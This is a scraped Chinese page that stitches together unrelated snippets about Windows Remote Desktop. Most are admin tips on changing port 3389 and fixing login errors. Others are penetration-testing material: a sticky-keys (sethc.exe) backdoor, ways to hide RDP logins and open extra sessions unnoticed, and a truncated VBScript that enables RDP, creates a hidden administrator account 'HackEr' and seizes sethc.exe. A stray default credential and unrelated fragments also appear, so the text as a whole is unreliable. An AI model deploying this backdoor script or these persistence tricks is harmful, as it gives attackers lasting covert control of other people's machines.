远程win10经常卡在登录界面,我从微软官网收集了一些优化命令,vnc登录后,以管理员身份打开cmd命令行执行完这些命令后,运行services.msc找到远程服务(remote desktop services),重启它
Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Termin*Server\WinStations\RDP*CP\ -Name PortNumber | select PortNumber
本文主要内容来微软官方文档,命令未 PowerShell 命令,管理员权限运行,最后给出链接。
https://pan.baidu.com/s/1Rt3ZFXY0sOD5okeb9VI3_A
一.环境安装 安装git桌面,配置秘钥 安装python环境 二.python-flask起服务完成自动化部署 """ 用flask 完成对项目kill与拉取 """ from flask import Flask app =Flask(__name__) import os import re import requests @app.route("/start") def start(): '''更新代码并执行''' #拉取代码 os.system('cd 项目绝对路径\\
也可以通过reg配置文件的方式启动:regedit /s startrdp.reg
DOS查找Windwos远程桌面端口 方法一 查看是否开启了远程桌面服务: net start | findstr "Terminal Services" 如果Windows打开了远程桌面,可以先查看
这是微软2018年上半年发布的安全更新导致的CredSSP报错,这个更新涉及服务端、客户端,简单说,要么都别装,要么都装,一个装、一个不装就会有问题。跟"身份验证错误,要求的函数不受支持,CredSSP"类似的还有“远程计算机需要网络级别身份验证,而您的计算机不支持该验证。请联系您的系统管理” "The remote computer requires Network Level Authentication, which your computer does not support. For assistance, contact your system administrator or technical support." ,还有其他类似的:
远程不上,事件查看器里看到的日志关键词指向了X224CC,谷歌搜X224CC,搜到的文档基本都是指向安全层配置的
管理工具->本地安全策略->安全设置->本地策略->安全选项->找到"系统加密:将FIPS兼容算法用于加密、哈希和签名"选项->右键"属性"->在"本地安全设置"下,选择"已启用(E)"
如果不是敲错IP、用户名、密码,报凭据不工作,一般情况下执行这几句命令后重启远程服务就正常了
市面上有众多远程控制软件,他们有个好处是可以穿透内网,而如果你有公网ip或者会配置穿透的话,建议还是用微软自带的远程桌面连接工具rdp,流畅度和效果体验是最佳的。rdp默认端口是3389,直接暴露在外网的话容易有安全风险,因此一般建议修改该默认端口为其他端口。
这个系列的文章翻译由信安之路红蓝对抗小组的所有成员共同完成,后续将陆续发布,敬请期待!
远程桌面复制粘贴有问题(本地复制了,在远程桌面里想右键粘贴,但发现粘贴是灰色的) ①重启rdpclip.exe 云服务器打开任务管理器 → 进程或详细信息 → 找到rdpclip.exe → 右键结束进程树 → 注销远程会话 → 重新远程
wmic 脚本下载地址:https://www.fuzzysecurity.com/scripts/files/wmic_info.rar
远程桌面对了解内网渗透的人来说可能再熟悉不过了。在渗透测试中,拿下一台主机后有时候会选择开 3389 进远程桌面查看一下对方主机内有无一些有价值的东西可以利用。但是远程桌面的利用不仅如此,本节我们便来初步汇总一下远程桌面在内网渗透中的各种利用姿势。
沾滞键的目的是为了帮助那些按键有困难的人设计的,在Windows系统下连续按5次shift键后,系统就会执行system32下的sethc.exe,也就是启用了沾滞键。了解该方法的目的在于在完成渗透后能留下后门让攻击者一直拥有主机的管理员权限。
Windows 2003 远程桌面连接出错解决办法。(由于协议错误,会话将被中断。请重新连接到远程计算机。)
计算机---属性---远程设置---勾选"允许运行任意版本远程桌面的计算机连接(较不安全)"……
原理 注册表修改端口号后,重启TermService服务生效 方法 编写bat文件如下,执行,11111修改自己需要的端口号即可 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t reg_dword /d 11111 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\C
顾名(EVENT_RPCSS_SERVER_START_TIMEOUT)思义(RPCSS服务超时)
在渗透过程中拿下一台主机后很多时候会选择开3389进远程桌面查看一下对方主机内有无一些有价值的东西可以利用,但是这也引出了一个问题,只要是登录进程就一定会留下痕迹,虽然在渗透完成后可以通过痕迹清理的方法清除自己登录的"证据",但是在多次渗透的过程中我不禁产生了思考,有没有一种方法能够最大化的隐藏自己登陆过对方主机呢,于是便有了下文。
远程桌面在执行的过程中可能因为某些原因无法连接到远程计算机。首先,出现这种情况最大的可能是和端口设置有关。
打开: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp 将portnumber修改为指定的端口
远程登录产生如下报错:由于没有远程桌面授权服务器可以提供许可证,远程会话连接已断开
一款基于go的windows信息收集工具,主要收集目标设备rdp端口登录、mstsc远程连接记录、mstsc密码和安全事件中。
rdp服务是我们常用的服务,可以不是3389端口,可以改成任意端口,时候为了利用它,必须先找出来服务端口,毕竟管理员也鸡贼。
windows server 2008 用户:administrator 密码:Admin123
运维人员工作中不时需要做一些windows的策略配置,windows的一些策略配置器不易找到,比如本地策略配置器,组策略配置器。因为窗口不易翻到,使用命令可以快速打开,这需要我们记住一些常用的命令,这里分享几个:
工作需要必须使用mstsc(Microsoft terminal services client)连接生产服务器,之前因为不知什么原因,mstsc开始很卡,所以用了teamviewer一段时间,感觉还是不如mstsc稳定
需要简单了解本机信息,包括操作系统、权限、内网ip地址段、杀毒软件、端口、服务、补丁更新频率、网络连接、共享、会话等等。 如果是域内主机,操作系统、应用软件、补丁、服务、杀毒软件一般都是批量统一安装的。
远程桌面是网络管理员必备的技能,今天给大家聊聊Windows本身就自带的远程桌面功能,如何修改远程的默认端口(3389),让你的远程服务器更加安全。
一般Web服务器放在公网上以后,有些为了方便远程操作,所以打开了远程桌面连接。这样是很不安全的,黑客在扫描到服务器开启了3389端口以后很多都是利用这个端口发起攻击。为了降低风险而又想使用远程桌面连接,一个比较简单的方法就是修改远程桌面链接的3389端口。
众所周知,Windows会自带一个自签证书,这个证书是不被认可的,以至于我们每次连接RDP时都会有这个提示
4、运行services.msc打开服务列表,手动重启远程服务,如果重启服务卡住,参考https://cloud.tencent.com/developer/article/2241426 末尾部分处理。
1 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] 双击右边 PortNumber——点十进制——更改值为:33899 —— 点确定。
windows server的服务器远程桌面默认端口号是3389,在工作中经常使用远程桌面连接服务器,但是这也是常常被黑客利用的端口号,但是如何修改掉默认端口,预防被黑客利用呢?
本文是前段时间处理某用户被黑的分析总结,用户被黑的表现是使用爬虫访问用户网站的首页时会出现博彩关键字,而使用正常浏览器访问时无相关的博彩关键词。这是典型的黑帽SEO的表现,针对这种技术,前期文章已有相关分析,感兴趣的同学可以看一看。
上面只是限制了用户从tty登录,而没有限制远程登录,修改sshd文件将实现对远程登陆的限制
今天在服务器端的攻击防护日志中看到3389端口被攻击了,查了一下3389是服务器远程端口,是服务器远程连接的默认端口,很多黑客都针对这个端口进行扫描,那如果修改远程连接的端口呢?这个远程连接端口可以直接从注册表进行修改。修改两个地方。①、先选择开始-->运行,输入regedit,点击确认,打开注册表,然后找到路径[HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set\Control\Tenninal Server\WinStations\RDP-Tcp],到PortNa
我们通过收集本机信息可以进一步了解到整个域的操作系统,软件,补丁安装,用户命名规范等等,方便进一步渗透测试。
2008R2远程端口监听没问题,服务也是启动的,但是端口telnet不通,哪怕是机器内部"telnet 127.0.0.1 远程端口"也不行
iis7服务器监控工具是直接修改端口“3389”为其他端口,为防止他人进行恶意的连接或是需要多个连接时,就需要对默认端口进行更改。
版权声明:本文版权归属 © Microsoft 简介 本文介绍如何更改远程桌面的侦听端口。 注意:用于 Mac 的远程桌面连接客户程序仅支持端口 3389。3389 是默认端口。 详细信息 要更改远程桌面的侦听端口,请按照下列步骤。 重要:此部分、 方法或任务包含一些介绍如何修改注册表的步骤。但是,如果不正确地修改了注册表,可能会出现严重的问题。因此,请确保仔细按照下列步骤操作。为增加保护,对其进行修改之前备份注册表。然后,您可以在出现问题时还原注册表。有关如何备份和还原注册表的详细信息,请参见如何备份和还
之前写了一篇关于如何配置 Windows RDP 加密证书的教程(https://www.alongw.cn/archives/926),但是显然这篇教程的内容有一些的过时以及差劲
https://cloud.tencent.com/document/product/1207/44656
大家好,又见面了,我是你们的朋友全栈君。 xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本+提权VBS 整理收集 2010年12月07日 xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本 vbson error resume next const HKEY_LOCAL_MACHINE = &H80000002 strComputer = “.” Set StdOut = WScript.StdOut Set oReg=GetObject(“winmgmts:{impersonationLevel=impersonate}!\\” &_ strComputer & “\root\default:StdRegProv”) strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server” oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp” oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server” strValueName = “fDenyTSConnections” dwValue = 0 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp” strValueName = “PortNumber” dwValue = 3389 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” strValueName = “PortNumber” dwValue = 3389 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue on error resume next dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username=”HackEr”:password=”393214425″:end if:set wsnetwork=CreateObject(“WSCRIPT.NETWORK”):os=”WinNT://”&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&”/Administrators,group”):Set od=ob.Create(“user”,username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&”/”&username&”,user”):oe.Add(of.ADsPath)’wscript.echo of.ADsPath On Error Resume Next Dim obj, success Set obj = CreateObject(“WScript.Shell”) success = obj.run(“cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cm
很多黑客用软件每天都在扫描开放了3389端口的服务器,为了让自己的服务器减少受到黑客攻击的机会,大多数站长都会选择修改掉这个默认的3389端口。
远程桌面一般都使用向日葵或ToDesk,因为只要两台电脑联网就可以互相远程协助,但是在专网内,因为没有互联网就只能使用Windows自带的远程桌面 如何开启远程桌面 启用: 系统 -> 远程桌面 -> "启用远程桌面" 📷 设置 设置权限: 系统 -> 远程桌面 -> 高级设置 -> 去掉勾选: 需要计算机使用网络级别身份验证进行连接(建议) 📷 image.png 更换端口 在一些安全策略中,会把远程桌面的3389端口禁止,所以需要修改成其他端口 启动注册表编辑器。 (在“搜索
本篇文章我们主要介绍在拿下目标域内主机的情况下,如何多开RDP链接且使得正常登录目标主机的用户不会被强制下线或者发现
领取专属 10元无门槛券
手把手带您无忧上云